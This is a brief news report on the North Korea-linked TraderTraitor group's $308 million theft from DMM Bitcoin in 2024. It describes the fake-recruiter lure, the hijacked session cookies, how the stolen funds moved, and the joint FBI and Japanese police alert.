North Korean hackers have stolen $308 million worth of Bitcoin from the Japanese cryptocurrency firm DMM Bitcoin in May 2024. The theft has been attributed to the TraderTraitor threat activity group, which is linked to North Korea. The U.S. Federal Bureau of Investigation, the Department of Defense Cyber Crime Center, and the National Police Agency of Japan have released a joint alert about the incident.
TraderTraitor is known for targeting companies in the Web3 sector through social engineering tactics. In the DMM Bitcoin case, the hackers contacted an employee at Ginco, a Japan-based cryptocurrency wallet software company, in March 2024. They posed as a recruiter and sent a malicious Python script hosted on GitHub as part of a supposed pre-employment test.
north Korean cyber theft tactics
The victim, who had access to Ginco’s wallet management system, was compromised after copying the Python code to their personal GitHub page. In mid-May 2024, the hackers used session cookie information to impersonate the employee and gain access to Ginco’s unencrypted communications system.
By late-May 2024, the hackers manipulated a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time. Chainalysis, a blockchain intelligence firm, confirmed that the stolen funds were moved through various services and finally to an online marketplace tied to the Cambodian conglomerate, HuiOne Group. This incident highlights the ongoing threat posed by sophisticated state-sponsored cybercriminal groups and the need for stronger security measures in the cryptocurrency sector.
International cybersecurity and law enforcement agencies are working together to address this issue.
